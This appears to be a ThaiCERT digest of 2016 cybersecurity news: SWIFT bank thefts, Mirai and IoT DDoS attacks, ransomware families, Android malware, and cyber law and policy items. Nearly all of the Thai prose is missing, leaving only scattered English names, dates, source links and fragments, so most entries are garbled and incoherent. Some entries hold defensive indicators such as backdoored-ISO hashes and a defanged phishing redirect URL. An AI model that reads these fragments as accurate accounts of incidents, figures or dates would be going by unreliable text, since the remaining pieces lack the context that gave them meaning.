ISC <http://thcert.co/kdDeze>

SWIFT
Sony Pictures


SWIFT
Lazarus
4 Sony Pictures 2557


Symantec

Sony SWIFT
Pictures 2557

12





: 30/05/2559
: The Guardian <http://thcert.co/IdpPR6>,
The Register <http://thcert.co/2XU2bT>,
Ars Technica <http://thcert.co/892DGB>

TeamViewer

TeamViewer
Dr.Web
BackDoor.TeamViewer.49
Adobe Flash Player TeamViewer

TeamViewer









: 31/05/2559
: Softpedia <http://thcert.co/eFdbAu>,
Dr.Web <http://thcert.co/k11FwQ>



FireEye


2559
Microsoft Office








FireEye
(https://www.thaicert.or.th/alerts/user/2015/al2015us003.html)

: 07/06/2559
: Softpedia <http://thcert.co/WtWZkL>,
FireEye <http://thcert.co/W9FxGD>

Twitter Pinterest
LinkedIn


LinkedIn, Tumblr
MySpace dadada
LinkedIn, Twitter Pinterest
OurMine
LinkedIn
Facebook


Twitter Pinterest



Have I Been Pwned (https://haveibeenpwned.com)
Twitter



2

: 07/06/2559
: Softpedia <http://thcert.co/oWXn3W>

Toyota Lexus

Toyota Lexus Toyota Lexus 2557


2559 Toyota Land Cruiser
2559









Lexus

: 09/06/2559
: BBC <http://thcert.co/vOOTj1>,
The Guardian <http://thcert.co/F4s3ic>


7
2559 Transparent Tribe


Softpedia 2559
2559
7 Android
Romantic Intruder

.








: 13/06/2559
: Softpedia <http://thcert.co/FKJehX>


Twitter
2
Naked Security
Twitter
2
DeRay Mckesson



4










Financial Fraud Action UK
: 15/06/2559
: Naked Security <http://thcert.co/I34cS9>

GoToMyPC

GoToMyPC
Remote Desktop Remote Desktop

18 2559
GoToMyPC TeamViewer



Remote Desktop
2

GoToMyPC



: 20/06/2559
: GoToMyPC <http://thcert.co/0DmNph>

Twitter Twitter
Mark Zuckerberg
20 2559
Twitter Pinterest Dick Costolo CEO Twitter
OurMine



Twitter

Twitter
OurMine
Twitter Pinterest Mark Zuckerberg

Mark Zuckerberg

: 21/06/2559
: Softpedia <http://thcert.co/xBLOo8>,
Recode <http://thcert.co/WnAWUj>

SWIFT
10
2559
SWIFT

5
10







SWIFT


: 28/06/2559
: Security Affairs <http://thcert.co/WCJqdK>

Lizard Squad
DDoS

Arbor's Security Engineering and Response Team (ASERT)
DDoS Lizard Squad
2558
Botnet DDoS

LizardStresser
2558 Lizard Squad



Linux

: 04/07/2559
: Threatpost <http://thcert.co/7c9uBj>,
Arbor Networks <http://thcert.co/0mk3yo>

iOS
iCloud
iOS

Find My iPhone 2 Find
My iPhone Apple
30-50 ID OTP



Apple ID Apple


Apple ID

40

: 11/07/2559
: MacRumors <http://thcert.co/P43Hrv>,
CSO Online <http://thcert.co/yIcwCr>

Marriott Hyatt

Marriott Hyatt 8,000




(POS: Point-of-Sale)
19
http://www.heihotels.com/notice/2


2558 2559

: 18/08/2559
: Engadget <http://thcert.co/X0ALLJ>

Steam
9.1
DLH.net Redeem

3

31 2559 DLH
LeakedSource
DotA 2 DLH.net

(https://www.leakedsource.com/main/databaselist/)
vBulletin
Steam DLH.net
Facebook (
Facebook)
Steam
LeakedSource
84%



Redeem
Steam 9.1
LeakedSource
: 22/08/2559
: ZDNet <http://thcert.co/0PxVKj>

Epic Games
8

Epic Games
Epic Games

Epic Games Access Token
2559 Facebook Facebook
Epic Games

8

https://www.leakedsource.com
SQL Injection
vBulletin



: 24/08/2559
: ZDNet <http://thcert.co/RFl0cy>

Fitness Tracker
McDonald's

McDonald's
Happy Meals Happy Meals
Step-iT
Fitness Tracker McDonald's




(Wearable)

(Consumer Product Safety Commission: CPSC)


70
7

30
()
: 24/08/2559
: Mashable <http://thcert.co/VJYbn7>,
CPSC <http://thcert.co/KSMy5z>

FBI

12 2559 DirBuster




FBI




IP
Acunetix


SQL Injection
SQLmap

: 30/08/2559
: Gizmodo <http://thcert.co/HfkWuy>,
CSO Online <http://thcert.co/pE9FMG>

macOS 10.12 (Sierra)


Razer kernel panic
Apple macOS Razer
10.12 (Sierra) Razer Synapse
21 2559 macOS 10.12

Razer
kernel panic

/Library/Extensions/RazerHid.kext

: 22/09/2559
: XORcat <http://thcert.co/Pz0gIY>

OVH DDoS 1.1 Tbps


IoT

OVH
21 2559
DDoS
1.1
Tbps ( 125 )

OVH

(Internet of Things)
(DVR)

botnet
150,000

1-30 Mbps
DDoS 1.5 Tbps DDoS


DDoS

: 28/09/2559
: SC Magazine <http://thcert.co/jtKELX>,
The Register <http://thcert.co/VLsVrc>

1.5
botnet DDoS

2559 response
DDoS
2
Brian Krebs DDoS
botnet
OVH request
DDoS 2
660 Gbps 1 Tbps
DDoS

Level 3
Brian Krebs

DAHUA Technology
(IoT - Internet of Things) 1 botnet



botnet username
CloudFlare BackConnect
DDoS Mirai
IoT
amplification attack Linux
request DDoS ( Mirai

http://blog.malwaremustdie.org/2559/08/mmd-0056-2016-linux-mirai-just.html)

DAHUA Technology DDoS

DDoS DDoS
IoT

: 30/09/2559
: Motherboard <http://thcert.co/JorQFh>


2559






20,000


: 04/10/2559
: Softpedia <http://thcert.co/hjppvB>,
Yonhap News Agency <http://thcert.co/rtgLN2>

GlobalSign

GlobalSign GlobalSign
root CA
ISP


GlobalSign GlobalSign
(https://support.globalsign.com/customer/portal/articles/1353318)
: 14/10/2559
: The Register <http://thcert.co/AmCwLA>,
GlobalSign <http://thcert.co/MMkXZf>

30 2559







2559


(Business Continuity Plan)





: 03/11/2559
: BBC <http://thcert.co/lCQAO4>

Tesco Bank

20,000

6 2559
Tesco Bank


40,000








(online criminal)

: 08/11/2559
: Ars Technica <http://thcert.co/T1euEn>

DDoS
IoT

BBC
DDoS
8-9 2559
Internet of Things (IoT)

Sberbank
Kaspersky
DDoS
IoT
60 1 Tbps
12



: 11/11/2559
: BBC <http://thcert.co/qrPJTm>

Lenovo
Windows Server 2016 November

Lenovo Lenovo
Microsoft Windows Server 2016
2559 (KB3200970)
Lenovo M5 ( )
X6 Windows Update
Microsoft Windows
Lenovo Server 2016
2559
Lenovo
: 22/11/2559
: Lenovo <http://thcert.co/EKaeRr>

ATM


Group IB ATM Cobalt

ATM
Diebold Nixdorf NCR ATM
ATM ATM
(
ATM ATM Jackpotting
2559)

: 23/11/2559
: The Hacker News <http://thcert.co/IgqLMq>,
Fortune <http://thcert.co/sZ3QL0>,
Softpedia <http://thcert.co/IhLxBO>

ISP DDoS
1 Mirai
27 2559 thaicert.or.th/papers/general/2559/
Deutsche Telekom pa2016ge001.html)

DDoS
SANS ISC

TR-069
1 ISP

German Federal Office for Information Security (BSI)
( TCP 7547)
2559
2 Deutsche Telekom
(Speedport W 921V Speedport W 723V Type B) (
2 SANS https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/)
ISP
SANS ISC
Mirai 7547
IoT
DDoS ( ISP
https://www. Shodan 41


7547

2


ZyXEL, D-Link




: 30/11/2559
: The Register <http://thcert.co/dN77MG>,
Security Affairs <http://thcert.co/yuMWRk>,
SANS ISC <http://thcert.co/c9o0Yr>

BBC
Chieveley (jammer)






: 06/12/2559
: TripWire <http://thcert.co/KZiWRP>,
BBC <http://thcert.co/MYXktY>


HIV

Indian Express
Health Solutions


2559
35,000








3
: 07/12/2559
: Softpedia <http://thcert.co/j7h00Y>

Skype

Skype
Skype ID Microsoft
Account Skype ID
2
URL LinkedIn
Baidu Microsoft Account

hxxps://www[.]linkedin[.]com/slink?code=e2nsPHa#jpulusiv=victimskypeid
Skype

hxxp://www[.]baidu[.]com/
link?url=6kdJhiuGhlv0r4EfUsqBK- Skype
W9t86Werul6GdqAieiiPyC
1. www.skype.com Skype ID
redirect

2. Profile

2559 3. Personal information
Change password
Skype Skype
Skype
(
Microsoft Account
Skype ID) Microsoft
Skype
Microsoft Account

1. https://account.microsoft.com () Microsoft Account
2. Security and Privacy ()
3. Account Security () More security settings ( )
4. Sign-in preferences Change sign-in preferences ()
5. Skype Skype Skype Save

: 21/12/2559
: Fortinet <http://thcert.co/FPXm8v>,
bruceb news <http://thcert.co/nNFCiC>

1
Ukrenergo


17 2559
1





2558

: 21/12/2559
: Hackread <http://thcert.co/KgCBDk>,
Hackread <http://thcert.co/ESiexX>

Leet DDoS
650 Gbps
Imperva
Imperva
21 2559
DDoS Leet Unix
( Linux)
650 Gbps ()

Leet
Mirai
Internet of Things (IoT)
header packet TCP Options 1337
Leet Elite
Imperva


: 29/12/2559
: Security Week <http://thcert.co/VecZi4>,
Imperva <http://thcert.co/3swdCG>







APT28 APT29






(DHS) FBI

: 30/12/2559
: Graham Cluley <http://thcert.co/AEww0U>,
US-CERT <http://thcert.co/ZjgJ44>

Law & Policy



Anonymous
#OpSafePharma
16
#OpSafePharma
Anonymous Artek
#OpSafePharma
16 2559
DDoS


30 2559

: 31/03/2559
: Softpedia <http://thcert.co/pWuU0O>


Open source

Open source


STAMP (Static Tool Analysis Modernization Project)

Open source Static
Open source

: 01/04/2559
: CSO <http://thcert.co/QMvy9e>

NIST

National Institute of Standards and Technology (NIST)
S/MIME PGP

(SP 800-177 Trustworthy Email)
2
2550 2559 NIST


NIST (http://csrc.nist.gov/publications/drafts/800-177/sp800-177_second-draft.pdf)
NIST
2559


: 04/04/2559
: The Register <http://thcert.co/TbNCbt>

SpyEye 24

2
24
SpyEye


2556

: 21/04/2559
: Krebs On Security <http://thcert.co/osf2DM>


Personal Data Protection Commission (PDPC)

4 K Box Entertainment Group 50,000
2014
PDPC

2555 7
2557



: 22/04/2559
: ZDNet <http://thcert.co/UsH3WB>




recovery key


Mac Pro

external harddisk 2

2558
Mac Pro iPhone 5S external harddisk 2
Mac Pro
Apple FileVault
iPhone 5S
: 28/04/2559
: Ars Technica <http://thcert.co/sl9vNb>





(Fifth Amendment)

: 02/05/2559
: The Verge <http://thcert.co/O2ptSA>

LulzSec

Jonnel De Asis 23 2559
LulzSec LulzSec Anonymous


55 (defacement)
Paul Biteng
23
Anonymous

: 03/05/2559
: Softpedia <http://thcert.co/kZjsE6>

David Levin Troy Hunt





SQL Injection


Havij



YouTube


: 10/05/2559
: ZDNet <http://thcert.co/xvIYuy>,
Windows IT Pro <http://thcert.co/LyCCb8>




GCHQ







(Phishing)











: 26/05/2559
: Motherboard <http://thcert.co/3TF3oZ>

2558 FBI NIT


Playpen
FBI IP Address, MAC Address

FBI 3
Network Investigative Tool (NIT)
1,000 FBI
135

FBI
Adobe Flash Player Firefox
FBI


FBI
FBI
: 01/06/2559
: Naked Security <http://thcert.co/NRvz6r>,
Motherboard <http://thcert.co/Yw2oQi>

2554

(Fourth Amendment)

221









: 02/06/2559
: Reuters <http://thcert.co/8cA6Sd>,
ZDNet <http://thcert.co/subnJQ>

50
45


50

2554
45

(Federal Security Service)






Lurk

: 03/06/2559
: Kaspersky <http://thcert.co/vBRL6o>,
Softpedia <http://thcert.co/pemeZW>




Straits Times
Cloud Security Alliance
2560













100,000

: 08/06/2559
: Straits Times <http://thcert.co/sG5KEq>

David Nosal







2551
David Nosal
Korn Ferry

2


Korn Ferry

: 06/07/2559
: Softpedia <http://thcert.co/4iTxw5>











FBI



(http://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf)
: 21/07/2559
: SC Magazine <http://thcert.co/JgSdrl>

Kickass Torrent Apple,


Facebook Coinbase

Artem Vaulin
Kickass Torrent Kickass
Torrent Facebook
Fanpage Kickass Torrent
2559 Apple
iTunes
IP Facebook
Apple, ()
Facebook Coinbase

Bitcoin
Coinbase
Kickass Torrent
Bitcoin Artem
Kickass Torrent Vaulin
iTunes



Kickass Torrent

: 25/07/2559
: Hackread <http://thcert.co/1rbS1l>

DDoS
2557
Chu request 6,652
Tsun-wai 20 16
15 DDoS
2557

Chu
Anonymous
Asia
Google
DDoS
Shanghai Commercial Bank
: 01/08/2559
: Softpedia <http://thcert.co/V1JfGt>,
South China Morning Post <http://thcert.co/rheuaN>


(FDIC - Federal Deposit Insurance Corporation)
(Digital Rights Management)

(Deposit Insurance)
2 (2-Factor Authentication)
FDIC



Phishing


FDIC



: 11/08/2559
: Federal News Radio <http://thcert.co/dJwigp>

2555
2

2

(Private Chat)





(Privacy Protection)






: 19/08/2559
: Vice <http://thcert.co/TonCz5>,
Fried <http://thcert.co/8jtdbg>

Verizon 5

Daniel Traeger spreadsheet


Verizon

5




2552 2557
.

: 29/09/2559
: Engadget <http://thcert.co/mVGK6V>,
Ars Technica <http://thcert.co/6gBin9>

Mozilla
WoSign StartCom Apple

2559 Mozilla Firefox
Mozilla
WoSign
(Certificate Authority - CA)

Apple

- SHA- WoSign 19
1 2559
20 2558 iOS macOS
Apple
SHA-1
WoSign

- StartCom CA StartCom

2558
CA
StartCom
- StartCom StartSSL
SHA-1

Mozilla

WoSign StartCom
1
: 04/10/2559
: The Register <http://thcert.co/Sggi0V>,
Softpedia <http://thcert.co/WpS7E9>

FBI
Lizard Squad PoodleCorp

FBI Voice
2 Zachary
Buchta
Bradley Jan Willem Van Rooy Van Rooy

Lizard Squad @LizardLands FBI
PoodleCorp ( ) direct
DDoS message


19
FBI
FBI IP


@fbiarelosers, @xotehpoodle
@LizardLands 2558
NCA
6
Lizard Squad
Buchta 15-20
@fbiarelosers
@xotehpoodle
Google
: 10/10/2559
: Motherboard <http://thcert.co/GLacQl>

IoT
CSA
Cloud Security Alliance (CSA)

(Internet of Things - IoT) IoT

13
IoT


(https://www.thaicert.or.th/newsbite/2016-09-30-01.html#2016-09-30-01) CSA
(https://cloudsecurityalliance.org/download/future-proofing-the-connected-world/)
IoT






: 10/10/2559
: Krebs on Security <http://thcert.co/oXyvqU>,
Government Technology <http://thcert.co/skTFTC>


Apple Watch


Apple Watch



Apple Watch

(wearable devices)



: 11/10/2559
: Telegraph <http://thcert.co/gaoKSm>,
The Verge <http://thcert.co/PXy6KY>

G7


G7

8 (https://www.treasury.gov/resource-center/international/g7-g20/Documents/G7%20Fundamental%20Elements%20Oct%202016.pdf)









: 14/10/2559
: Infosecurity Magazine <http://thcert.co/sAFlnL>


IoT

Mark Warner
IoT

(Senate Cybersecurity Caucus)




(Federal Communications Commission FCC)
(Federal Trade Commission FTC)
(Department of Homeland Security DHS)
Warner

(Internet of Things IoT)
ISP


DDoS (
IP )

ISP


IoT
IoT


IoT
IoT
(
)
IoT
DDoS

: 26/10/2559
: Krebs on Security <http://thcert.co/WvIXCA>

FCC ISP

-
(Federal Communications Commission FCC)

(ISP)

-

- 30

5,000
Federal Trade Commission (FTC), U.S. Secret Service
- of breaches FBI 7

-


FTC
- (FTC data security requirements)

NIST (NIST cyber-security framework)

-



3
6

1
Facebook Google

FCC

FCC

: 01/11/2559
: FCC <http://thcert.co/tVaxrS>,
Naked Security <http://thcert.co/SooSbp>

2559-2564


2559-2564 (National Cyber Security Strategy 2016-2021)
1,900 -
( 84,000 ) (NCSC)
6 700
3
- National

Cyber Crime Unit
:
50
(critical infrastructures)
-


:




(Cyber Security Innovation Centre)
:

: 16/11/2559
: GOV.UK <http://thcert.co/ejBZeh>

NIST Homeland Security


IoT
15 2559
NIST Homeland Security

Internet of Homeland Security
Things (IoT) NIST
NIST Special Publication 800-160 IoT
Homeland Security 17
IoT IoT

NIST Special Publication 800-160
( )
(Systems Security Engineering)
257 2



IoT

: 16/11/2559
: NIST <http://thcert.co/dQKofS>,
Homeland Security <http://thcert.co/0NSrPj>



The Guardian
70
2557
8%
2559 31%

( hands-free)






GPS

: 20/12/2559
: The Guardian <http://thcert.co/hZmk3V>

NIST

NIST Special Publication 800-184 Guide for Cybersecurity Event Recovery 53

(Cybersecurity framework)
5
1. Identify
2. Protect
3. Detect
4. Respond
5. Recovery
NIST
5
(Recovery)

NIST
: 28/12/2559
: Federal News Radio <http://thcert.co/zHaW6k>,
NIST <http://thcert.co/bM94dQ>

1 2560




1 2560







: 30/12/2559
: ZDNet <http://thcert.co/9ilDuX>

Malware

Emsisoft Lab
HydraCrypt UmbreCrypt
Boss

(ransomware) CrypBoss 2
(http://emsi.at/DecryptHydraCrypt)
Emsisoft Lab


15
HydraCrypt
UmbreCrypt Cryp-
: 15/02/2559
: Emsisoft <http://thcert.co/FQBARG>

Linux Mint
Backdoor ISO
21 2559
Linux Mint
ISO
Linux Mint
www.linuxmint.com
Backdoor ISO
ISO Linux
Mint 20 2559
ISO Backdoor
Linux Mint 17.3 Cinnamon
MD5 Checksum
ISO Linux
Mint
Backdoor
MD5 Checksum ISO
ISO

6e7f7e03500747c6c3bfece2c9c8394f linuxmint-17.3-cinnamon-32bit.iso
e71a2aad8b58605e906dbea444dc4983 linuxmint-17.3-cinnamon-64bit.iso
30fef1aa1134c5f3778c77c4417f7238 linuxmint-17.3-cinnamon-nocodecs-32bit.iso
3406350a87c201cdca0927b1bc7c2ccd linuxmint-17.3-cinnamon-nocodecs-64bit.iso
df38af96e99726bb0a1ef3e5cd47563d linuxmint-17.3-cinnamon-oem-64bit.iso
: 23/02/2559
: The Linux Mint Blog <http://thcert.co/RdMrq>

CTB-Locker



CTB-Locker


Windows


: 29/02/2559
: Bleeping Computer <http://thcert.co/uuKPTO>

Porn clicker Google Play


ESET

Android Android/Clicker Google Play
Google Play Google Play
2558 343

3,600


Subway Surfers
GTA
Porn clicker

: 01/03/2559
: We Live Security <http://thcert.co/JAZFMK>

KeRanger
Mac

1 bitcoin
Palo Alto 14,000
(ransomware)
KeRanger
Mac 5 2559 Apple

OS X OS X


Palo Alto (http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer)

4 2559 Palo Alto
Installer
Transmission 2.90
(transmissionbt.com)

3
: 08/03/2559
: Palo Alto <http://thcert.co/ipN1dq>

TeslaCrypt 4.0


Heimdal 1,200
TeslaCrypt 4.0


RSA 4096

TeslaDecoder



600
Virustotal 3-4
(
21 2558)
: 24/03/2559
: Heimdal Security <http://thcert.co/9ZZOdO>

Android Flash Player


Google
ESET
Android
Flash Player
2 (2-Factor Authentication)
Android/Spy.Agent.SI
1. (Administrator privileges) Settings -> Security -> Device administrators -> Flash Player -> Deactivate

Google Safe mode

3. Flash Player Settings -> Apps/Application manager -> Flash Player -> Uninstall

IP
SMS
(C2)
OTP
ESET

: 25/03/2559
: We Live Security <http://thcert.co/nFWUsO>

Petya MFT

(ransomware)
MFT


(
)




Petya

Petya .exe


MFT (Master File Table)


: 29/03/2559
: Bleeping Computer <http://thcert.co/rygvQo>

ESET
Remaiten Backdoor
DDoS
Tsunami Gafgyt

23 (Telnet)

(Default Password)

: 31/03/2559
: SC Magazine <http://thcert.co/w7Zye3>

Android.Lockdroid
Android

Android.Lockdroid
(ransomware)
Android


2559 Symantec device administrator

Android
10,000 100



Symantec
Android


: 01/04/2559
: Symantec <http://thcert.co/islIM2>

Google Play Store 100

Dr.Web Dr.Web Google


Google
Android.Spy.277
Play Store Google Play Store
104 Dr.Web
3.2 (https://vms.drweb.com/virus/?_is=1&i=8020079)
Google
Play Store


(
IMEI, , GPS)

: 05/04/2559
: Softpedia <http://thcert.co/j1w54c>

OSX.Pirrit Mac OS X

Adobe Photoshop CC
Cybereason Labs
(adware)
Mac OS X

OS X
OSX.Pirrit

Microsoft Office 2016

: 08/04/2559
: Threatpost <http://thcert.co/qUNkp9>

CryptoHost
.rar
CryptoHost
(ransomware)
- 2559

.rar CryptoHost
0.33 bitcoin
140
Malware Hunter

: 11/04/2559
: Bleeping Computer <http://thcert.co/P28v0Z>

!
Amazon
Mike Olsen URL


Amazon
admin


admin Amazon
admin
iframe
: 12/04/2559
: ZDNet <http://thcert.co/sZDBUU>

Jigsaw

Jigsaw
.fun
Jigsaw
Saw 0.4 bitcoin 160



JigSawDecrypter
(https://download.bleepingcomputer.com/demonslay335/JigSawDecrypter.zip)
1,000
: 12/04/2559
: Softpedia <http://thcert.co/OfsltG>

ATM

Trend Micro Windows XP
European Cybercrime Centre (EC3)
ATM
2554-2558
ATM
2557-2558
15%
ATM
ATM ( )
ATM
: 18/04/2559
: Trend Micro <http://thcert.co/FUkRTG>

SamSam JBoss

2559

Cisco
SamSam
JBoss Backdoor

1 Cisco
3.2 JBoss





: 19/04/2559
: The Register <http://thcert.co/4dNQlX>

CryptXXX
Bitcoin


CryptXXX
2559

.crypt
1.2 Bitcoin 500
Bitcoin


FTP,

: 20/04/2559
: Proofpoint <http://thcert.co/lCkNQw>

TeslaCrypt

Endgame Inc.

TeslaCrypt



TeslaCrypt (
4.1)

.zip
.js
JavaScript

: 21/04/2559
: Threatpost <http://thcert.co/f72VXh>

Android
root


Blue Coat Labs
Android
Android towelroot (CVE-2014-3153)
4.4.4 root
Android 4.4.4



Factory Reset
Dogspectus

root
CYBER.POLICE 100%
iTunes Gift Card

Android 4.4.4

2

Hacking Team 2558
: 26/04/2559
: ZDNet <http://thcert.co/1i6NVy>,
Threatpost <http://thcert.co/C73RU0>

! Play Store

Doctor Web
Play
Android.Spy.277.origin Google Store
Play Store 100
1

Google Play Store







Doctor Web Google
Play Store
Check Point
: 26/04/2559
: Check Point <http://thcert.co/2HZ5uo>,
Graham Cluley <http://thcert.co/jsYfhZ>

Pirate Bay

Malwarebytes
Pirate Bay



23-24 2559









: 27/04/2559
: Malwarebytes <http://thcert.co/A3yG2X>

CryptXXX

CryptXXX

2559 1
.crypt
500
Kaspersky

CryptXXX

Kaspersky (http://media.kaspersky.com/utilities/VirusUtilities/RU/rannohdecryptor.exe)
: 27/04/2559
: Threatpost <http://thcert.co/7ncPj5>

7ev3n-HONE$T


(ransomware) 7ev3n-HONE$T
.r5A
1 Bitcoin
400

: 28/04/2559
: Bleeping Computer <http://thcert.co/VXVPWr>

Internet of Things (IoT)

Institute for Critical Infrastructure Technology (ICIT)









: 28/04/2559
: We Live Security <http://thcert.co/mqwk3Q>

Alpha


Alpha

.encrypt
https://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip
400
iTunes Gift Cards

: 02/05/2559
: Bleeping Computer <http://thcert.co/S0aWYK>

FBI

FBI
(https://www.fbi.gov/news/stories/2559/april/incidents-of-ransomware-on-the-rise) FBI






FBI



: 03/05/2559
: Threatpost <http://thcert.co/h7efzq>

Android
SMS

Intel Security Mobile Research


Android


Play
Store
Android_Update_6.apk

Android
apk


IMEI

SMS

: 03/05/2559
: McAfee <http://thcert.co/BTQn89>

Google Play Store


PhishLabs
Android
Google Play Store Google
2559 11 Play Store





: 03/05/2559
: Softpedia <http://thcert.co/HFFxs0>


Dridex
Cerber
Cerber
Adobe Flash
Player 2559
Adobe Flash Player Jigsaw




FireEye

Dridex
Cerber
Microsoft Office
Microsoft Office
Macro Macro

Dridex
Locky




: 13/05/2559
: Fireeye <http://thcert.co/rdG1sp>,
Trend Micro <http://thcert.co/C7J8yp>

Pathe Windows 25% Internet Explorer
Flash Player Java
CryptoXXX

Angler Exploit Kit










: 16/05/2559
: Malwarebytes <http://thcert.co/E7jbPR>

CryptoXXX 2.0
CryptoXXX Kaspersky
CryptoXXX
2559
.crypt RannohDecryptor 1.9.1.0
500
Kaspersky Kaspersky (https://support.kaspersky.com/viruses/disinfection/8547)


( CryptoXXX 2.0)




: 17/05/2559
: Security Affairs <http://thcert.co/dXxUYN>

TeslaCrypt

TeslaCrypt


ESET

TeslaCrypt
http://support.eset.com/kb6051/
https://id-ransomware.malwarehunterteam.com

: 19/05/2559
: Bleeping Computer <http://thcert.co/FSAiLm>

! WhatsApp Gold




WhatsApp Gold

WhatsApp


WhatsApp Gold

SMS


: 26/05/2559
: Help Net Security <http://thcert.co/Ka05Lt>

ZCryptor
.zcrypt

Microsoft
ZCryptor


(



)
( )
Flash Player
Microsoft Office

.zcrypt
: 30/05/2559
: Microsoft <http://thcert.co/I6nnJs>

Asus LiveUpdate

Duo Labs Asus LiveUpdate



(Bloatware)




Asus
Asus LiveUpdate
Asus


Asus LiveUpdate
Asus Asus
Windows Asus
Asus Live Update
BIOS

Lenovo
HTTP


Wi-Fi

Lenovo Accelerator Application



Windows

Duo Labs Acer, Asus, Dell, HP Lenovo

: 08/06/2559
: Morgan Gangwere <http://thcert.co/7FaxBg>

Android
URL

2559 Kaspersky
Android Triada (Phishing)

Triada

2559 Kaspersky
Triada


SMS
Triada
:
Android Browser ( Android), 360 Secure Browser, Cheetah Browser Oupeng Browser
Triada
root
(:
Android
)

Home page
URL
: 13/06/2559
: Graham Cluley <http://thcert.co/CAep8s>,
Kaspersky <http://thcert.co/BjALqE>

FLocker
Android

FLocker FLocker

FLocker
Android



FLocker
2558


iTunes Gift Card
FLocker

: 13/06/2559
: Graham Cluley <http://thcert.co/CAep8s>,
Kaspersky <http://thcert.co/BjALqE>

iOS App Store


SDK

FireEye iOS
iOS App Store Apple

(SDK) Vpon App Store


App Store
FireEye 2558
XcodeGhost
iOS
(https://www.thaicert.or.th/alerts/user/2015/al2015us006.html)
iOS
FireEye
App Store Vpon iOS
(https://www.thaicert.or.th/papers/technical/2014/pa2014te003.html)
AdsMogo
36 (
2559)
FireEye Apple
Vpon
: 15/06/2559
: FireEye <http://thcert.co/9tr75i>

TeamViewer

TeamViewer 11)


TeamViewer (
) Trend Micro
TeamViewer
1
Trend Micro
TeamViewer
TeamViewer

TeamViewer
Adobe Flash
TeamViewer Player
6.0.17222.0 TeamViewer
2553 ( TeamViewer

: 16/06/2559
: Trend Micro <http://thcert.co/5ee2V1>

True Lenovo P1m


True
Lenovo P1m SMS

Lenovo

P1ma40_S006_160615_16G_TRUE


> >
1,334 MB

: 20/06/2559
: Lenovo <http://thcert.co/AhnWYE>,
Pantip <http://thcert.co/TKvRKw>

JavaScript


RAA


JavaScript ( .js) .exe .js
mgJaXnwanxlS_doc_.js
Windows Script Host
JavaScript
250 Microsoft
(https://technet.microsoft.com/en-us/library/ee198684.aspx)
: 21/06/2559
: Bleeping Computer <http://thcert.co/qtxD5m>

Godless
Play Store root

Trend Micro
Godless
Google Play Store
root
Trend Micro
850,000
45%

3
Godless
Android
2 root root
CVE-2015-3636 (PingPongRoot) CVE-2014-3153 (Towelroot)
factory reset

Android

5.1
Google Play
90% Android
Store 100%
Trend Micro
Google Play
Store Godless


root

: 22/06/2559
: Trend Micro <http://thcert.co/zUOkF9>

OTP
Trend Micro 6. OTP
BKDR_MANGIT.SM
OTP

9 7. OTP

8,800


600 10

OTP SMS
1.

SMS
2.
SMS

3.


Google Play Store Apple Store
4.


5.

: 21/06/2559
: Bleeping Computer <http://thcert.co/qtxD5m>

Facebook

- .js .vbs
Facebook

( https://www.thaicert.or.th/alerts/user/2016/al2016us001.html)
- Windows Script Host (https://technet.microsoft.com/en-us/library/ee198684.aspx)
-




Facebook - Facebook
JavaScript (.js)


-
Facebook (https://www.facebook.com/settings?tab=applications)
-

Facebook


: 28/06/2559
: Hackread <http://thcert.co/RSzuEm>,
StackExchange <http://thcert.co/MvFl54>


Office 365
22 2559


Microsoft Office 365 Macro
57%
Microsoft Office 365
Dridex
Cerber


Enable Content Macros

Cerber

500

: 28/06/2559
: Avanan <http://thcert.co/ftSo2G>,
The Register <http://thcert.co/bpAycH>

LevelDropper
Play Store root

Android root Store

Godless
Google Play Store
Android root
LevelDropper Google Play
Store
Android
6.0
Android
root 6.0
Android


root





Google Play
: 28/06/2559
: Lookout <http://thcert.co/MEFVEN>

Avast
Retefe
HTTPS


JavaScript



HTTPS
Proxy







HTTPS

: 29/06/2559
: Help Net Security <http://thcert.co/dYYr2z>

Hummer Android
35,000 root

Cheetah Mobile
Android
Hummer
root Android
root






Hummer
150,000
9
35,000 Android root


root Android
6.0
Factory Reset Android
6.0
Android


500,000
: 01/07/2559
: Help Net Security <http://thcert.co/YXA5vO>,
Cheetah Mobile <http://thcert.co/kUdcRz>

Mac

BitDefender Mac
Eleanor (Backdoor.MAC.Eleanor) App Store
Backdoor



Mac

EasyDoc Converter



Tor




: 06/07/2559
: BitDefender <http://thcert.co/OCs4jU>

Keydnap Mac

ESET Tor,
Keydnap Mac OS X
Keychain


Keydnap

.zip Gatekeeper

.jpg .txt
(Unix executable)
space ( Mac OS X
screenshot.jpg screenshot.jpg)
Mac OS X


Terminal




backdoor

: 08/07/2559
: We Live Security <http://thcert.co/cgF5Qy>


Pokemon GO

Pokemon GO Pokemon GO
Android iOS

2559


Play Store App Store
Play Store
App Store

Proofpoint

Pokemon GO Android
Backdoor Droidjack

: 11/07/2559
: Proofpoint <http://thcert.co/TvdV5P>

Ranscam

Talos
Ranscam




(https://www.facebook.com/thaicert/videos/657180994430037/)








Ranscam



: 14/07/2559
: Talos <http://thcert.co/IG7Xgh>

Europol



Europol

Shade
Intel Security, Kaspersky
Lab Intel Security
No More Ransom Kaspersky Lab
(https://www.nomoreransom.org)



: 26/07/2559
: Help Net Security <http://thcert.co/UrAztL>

Microsoft
..WSF ( . 2 )

Microsoft
Nemucod .ZIP
.WSF .
( (
) Nemucod spreadsheet_1529..wsf)
.ZIP



.ZIP .WSF
.. .WSF
.WSF (Windows Scripting File)
JavaScript VBScript

Windows Scripting Host

: 28/07/2559
: The Register <http://thcert.co/xnpCt9>,
Microsoft <http://thcert.co/czD4Ql>

SpyNote
Android

Palo Alto Networks Palo Alto Networks


SpyNote
Remote Access Trojan (RAT)
Android





root




: 02/08/2559
: Threatpost <http://thcert.co/o2f1nF>,
Palo Alto Networks <http://thcert.co/GXRBEv>

FossHub
Audacity Classic Shell

FossHub (http://www.fosshub.com/) MBR
2
Freeware Open Source 2559
Cult of Peggle (https://twitter.com/CultofPeggle) FossHub Audacity
FossHub Classic Shell FossHub



Audacity
Classic Shell FossHub



: 04/08/2559
: Softpedia <http://thcert.co/tUYnn1>,
Audacity <http://thcert.co/erqT1S>

Google Play Store


155 2.8

Dr.Web Dr.Web

Android Google Play Store (SDK) SDK
155
Android.Spy.305
2.8


